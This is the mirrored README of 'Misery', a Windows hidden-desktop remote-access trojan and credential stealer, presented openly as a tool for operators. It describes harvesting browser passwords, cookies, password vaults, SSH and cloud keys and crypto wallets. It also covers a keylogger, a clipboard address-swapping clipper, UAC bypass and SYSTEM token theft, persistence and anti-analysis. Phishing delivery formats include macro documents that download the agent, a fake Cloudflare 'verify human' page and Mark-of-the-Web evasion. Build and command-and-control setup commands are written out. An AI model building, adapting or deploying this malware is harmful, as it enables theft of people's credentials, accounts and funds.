mirror of
https://git.churchofmalware.org/JYenn/Misery
synced 2026-09-22 05:27:07 +00:00
main
╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✠════════════════════════════════════════════════════════════════════════════════════✠ ║
║ MISERY : • A H V N C T R O J A N & S T E A L E R ║
║ WINDOWS HVNC • CREDENTIAL STEALER • ENCRYPTED C2 ║
║ ✠════════════════════════════════════════════════════════════════════════════════════✠ ║
║ ║
║ Fork of the 2023-era Creal stealer. Chrome locked credential decryption behind App-Bound ║
║ Encryption (ABE) in mid-2024. The agent spawns a suspended browser, reflectively injects a ║
║ payload DLL, and walks that COM object in-process so decrypted creds never touch disk. ABE ║
║ research: [xaitax]. Local testing and research only. ║
║ ║
║ NO LICENCE GRANTED. FOR AUTHORIZED TESTING ONLY. ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ Contents Index List ║
║ ‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾ ║
║ [ 0x01 ] ~ What It Is : The tool in one line. ║
║ [ 0x02 ] ~ Features : What it does, grouped by intent. ║
║ [ 0x03 ] ~ How It Works : The underlying mechanics. ║
║ [ 0x04 ] ~ Delivery Formats : The 9 payload wrappers. ║
║ [ 0x05 ] ~ C2 Modes : Reverse TCP / CDN / EtherHiding. ║
║ [ 0x06 ] ~ Console Commands : What the operator types. ║
║ [ 0x07 ] ~ Setup : Quick start + build. ║
║ [ 0x08 ] ~ Project Layout : Repo structure. ║
║ [ 0x09 ] ~ Tested On : Verified targets. ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x01 - What It Is ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ > ; A Windows remote-access trojan that controls a hidden desktop and steals browser ║
║ credentials, cookies, sessions, and tokens. It uses reflective injection and encrypted ║
║ C2, with Chrome App-Bound Encryption support. ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x02 - Features ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ > WATCH ║
║ + Hidden desktop (hvnc start / hvnc launch chrome) - GDI apps and a real Chromium on a ║
║ hidden desktop, streamed live. ║
║ + Ghosted browser (ghost <url>) - hidden Chrome/Edge session riding the victim's cookies ║
║ and logins. ║
║ ║
║ > STEAL ║
║ + Credential harvesting - Chrome, Edge, Brave, Opera, Opera GX, Firefox. ║
║ + Session harvesting - payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH ║
║ keys, Wi-Fi passwords, wallet extensions, Signal. ║
║ + Password managers - LastPass (raw vault capture), Windows Credential Manager, Proton ║
║ Pass (raw vault capture). ║
║ + Games - Minecraft accounts, Roblox cookies, Epic, Battle.net, Riot, Ubisoft, GOG, EA, ║
║ Rockstar. ║
║ + Network clients - WinSCP, PuTTY, mRemoteNG, MobaXterm, OpenVPN. ║
║ + AI assistants - Claude Desktop, OpenAI Codex, Gemini CLI, opencode. ║
║ + Keylogger and clipboard monitoring - every stroke, every copy, driven by one event ║
║ channel. ║
║ ║
║ > CALL HOME ║
║ + Reverse TCP - the agent connects back to the console listener. ║
║ + HTTPS beacon via CDN - encrypted frames POST through a Cloudflare Worker and Zero Trust ║
║ Tunnel; no public IP needed. ║
║ + EtherHiding - the TCP endpoint resolves from a smart contract on a public chain; the ║
║ binary carries no C2 address and the C2 rotates by contract call. ║
║ ║
║ > TAKE CRYPTO ║
║ + Clipper (clipswap) - clipboard wallet addresses swapped for the operator's address per ║
║ chain; BIP39 seed phrases captured. Addresses are build-time options (CLIP_BTC=...) - ║
║ empty skips the chain. ║
║ + Seed finder - BIP39 seed phrases, WIF and hex private keys, 2FA secrets, and wallet ║
║ keyfiles swept from documents and wallet app dirs. ║
║ ║
║ > STAY ║
║ + Persistence - user-registry Run key and WMI event subscriptions. ║
║ + Anti-analysis - user-mode environment checks, reflective injection. ║
║ [ hidden ] ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x03 - How It Works ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ > Channel : ECDH P-256 handshake. Console keeps the private half in .misery_key; agent ║
║ ships the public half only. Fresh AES-256-GCM key per session. No key material ║
║ repeats across bots. ║
║ ║
║ > Stealing : The v20 master key comes from the COM IElevator service, called inside a ║
║ suspended, freshly spawned browser via reflective payload injection so the ║
║ process-path check passes. The offline agent falls back to the DPAPI v10 key. ║
║ No disk write; the browser never visibly opens. ║
║ ║
║ > HVNC : GDI apps run on a hidden desktop and stream frames to the operator view. ║
║ Ghosted sessions drive a real Chromium over Chrome DevTools Protocol, logged ║
║ into the victim's profiles. The browser is them. ║
║ ║
║ > Crypto : Clipboard wallet addresses swapped per chain; BIP39 seeds, private keys, 2FA ║
║ seeds and wallet keyfiles captured from the clipboard and files. Driven by the ║
║ same event channel as the keylogger. ║
║ ║
║ > Elevate : Relaunch as admin via a forged PEB (process environment block) and COM ║
║ auto-elevation (CMSTPLUA / ICMLuaUtil), then SYSTEM through SeDebug token ║
║ theft from a non-PPL process. ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x04 - Delivery Formats ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ Build with setup.py -p <formats>. Output goes to dist/ with manifest.json (sha256/size per ║
║ file). Run --list-formats for full list + dependencies. ║
║ ║
║ Formats: ║
║ + docm : Word macro; Document_Open chains to cmd/curl download ║
║ + xlsm : Excel macro; Workbook_Open chains to cmd/curl download ║
║ + lnk : Shortcut + .cmd; probes Downloads/Desktop, runs via decoy PDF ║
║ + pdf : Agent embedded as PDF attachment ║
║ + html : OneDrive-style page; agent in zip blob behind button ║
║ + clickfix : Fake Cloudflare 'Verify human' page; copies cmd to clipboard ║
║ + iso : ISO container; sidesteps Mark-of-the-Web ║
║ + polyglot_exe_zip : Runs as exe, opens as zip with .lnk + .cmd ║
║ + polyglot_html : Runs as exe, shows decoy page in browser ║
║ ║
║ Formats prefixed 'docm, xlsm, lnk, clickfix, polyglot_exe_zip' fetch from STAGE_URL on open. ║
║ 'pdf, html, iso, polyglot_html' carry the agent. Use -p all to build every format. ║
║ ║
║ Example: ║
║ python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -p docm,iso -o misery \ ║
║ STAGE_URL=http://127.0.0.1:8080/misery.exe ║
║ ║
║ Notes: ║
║ • Office bases (docm/xlsm) are pre-compiled. Only inject STAGE_URL + filename. ║
║ • For lnk/polyglot_exe_zip: host <out>.cmd and <out>.decoy.pdf next to agent. ║
║ • MOTW on downloads: extract with 7-Zip/WinRAR to bypass SmartScreen. ║
║ • Optional deps: pip install pylnk3 pycdlib pikepdf python-docx openpyxl ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x05 - C2 Modes ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ Reverse TCP (default): ║
║ Agent connects back to console listener. No public IP; you control the endpoint. ║
║ ║
║ HTTPS beacon via CDN: ║
║ Agent POSTs to Cloudflare Worker → Zero Trust Tunnel → console. No public IP. setup.py ║
║ generates deploy/worker.js + deploy/cloudflared-config.yml. Deploy: wrangler deploy, fill ║
║ tunnel UUID, cloudflared tunnel run. ║
║ ║
║ EtherHiding: ║
║ Agent resolves C2 endpoint from smart contract (read-only eth_call). Binary carries no ║
║ hardcoded address; rotate by updating contract. RPC failure falls back to compiled ║
║ endpoint. ║
║ ║
║ Deploy resolver: python tools/etherhiding.py update --contract 0x... --value HOST:PORT --k ║
║ Read endpoint: python tools/etherhiding.py read --contract 0x... ║
║ ║
║ Value is bytes32 host:port (31 chars max). Env vars HVNC_CHAIN_RPC / HVNC_CHAIN_CONTRACT ║
║ override at runtime; explicit argv endpoint overrides chain. ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x06 - Console Commands ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
╔──────────────────────┬───────────────────────────────────────────────────────────────────────────╗
║bot │list bots; bot <id> targets one, bot all broadcasts ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║steal │run credential and session harvesting ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║loot / dump │replay the last steal result as boxed terminal sections ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║elevate [system] │relaunch the agent as admin; system chains to SYSTEM ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║hvnc start / stop │start or stop the hidden desktop session ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║hvnc launch [path] │launch an app (default Chrome) on the hidden desktop ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║hvnc quality [10-100] │set streamed frame JPEG quality ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║ghost <url> │open a URL in a ghosted hidden browser ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║ghost nav <url> │navigate the ghost browser ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║ghost stop │stop the ghost session ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║keylog │toggle the keylogger ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║clip │read the victim's clipboard ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║clipswap │toggle the crypto clipper (address swap + seed capture) ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║shell / ps <cmd> │run a hidden PowerShell one-liner on the agent ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║history │show command history ║
╠──────────────────────┼───────────────────────────────────────────────────────────────────────────╣
║clear / exit │clear the terminal / quit ║
╚──────────────────────┴───────────────────────────────────────────────────────────────────────────╝
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x07 - Setup ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ > Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang). A fresh checkout builds ║
║ against 127.0.0.1:4444. Run setup.py once so .misery_key exists. ║
║ ║
║ > Quick start - setup.py writes src/config.h, saves the console's ECDH key to .misery_key, ║
║ python setup.py -g # interactive ║
║ python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent ║
║ ║
║ > Run the console listener, then the agent: ║
║ .\build\console.exe ║
║ .\build\agent.exe ║
║ ║
║ > Type 'help' in the console for the full command list. ║
║ ║
║ > CDN mode: ║
║ python setup.py -t https_cdn BEACON_URL=https://<you>.workers.dev/poll \ ║
║ AUTH_SECRET=<secret> TUNNEL_HOST=c2.example.com ║
║ ║
║ > EtherHiding wired in (or pass it in the wizard under TCP): ║
║ python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 \ ║
║ CHAIN_CONTRACT=0x... CHAIN_RPC=https://cloudflare-eth.com ║
║ ║
║ > Build: ║
║ MSVC : cmake -S . -B build -G "Visual Studio 17 2022" -A x64 ║
║ cmake --build build --config Release ║
║ MinGW: cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release ║
║ cmake --build build -j 4 ║
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x08 - Project Layout ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
╔──────────────────────────┬───────────────────────────────────────────────────────────────────────╗
║src/agent │entry, C2 client, injector, persistence ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/console │operator console + listener ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/payload │payload DLL, reflective loader, trampoline ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/stealer │Misery-derived sources ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/hvnc │hidden-desktop session ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/ghost │ghosted browser session ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/browser │CDP client (Page/Input over WebSocket) ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/rat │keylogger + clipboard ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/clipper │crypto clipper (address swap, BIP39 seed capture) ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/transport │encrypted TCP framing, HTTPS beacon carrier, compression ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║src/evasion │indirect syscalls, anti-analysis, UAC/token elevation, helpers ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║tools/ │operator helpers (EtherHiding resolver read/update) ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║wrappers_bases/ │Office-authored compiled macro bases (docm/xlsm) ║
╠──────────────────────────┼───────────────────────────────────────────────────────────────────────╣
║build/ │out-of-source build dir ║
╚──────────────────────────┴───────────────────────────────────────────────────────────────────────╝
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ [ 0x09 - Tested On ] ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
╔────────────────────────────┬─────────────────────────────────────────────────────────────────────╗
║Google Chrome │151.0.7922.140 ║
╠────────────────────────────┼─────────────────────────────────────────────────────────────────────╣
║Microsoft Edge │151.0.4129.59 ║
╠────────────────────────────┼─────────────────────────────────────────────────────────────────────╣
║Elevation chain │Windows 11 25H2 (build 26200) ║
╚────────────────────────────┴─────────────────────────────────────────────────────────────────────╝
║ ║
╠══════════════════════════════════════════════════════════════════════════════════════════════════╣
║ ║
║ MISERY • Windows remote-access trojan and credential stealer ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════╝
Languages
C++
87.5%
Python
10.5%
CMake
0.9%
Assembly
0.8%
C
0.3%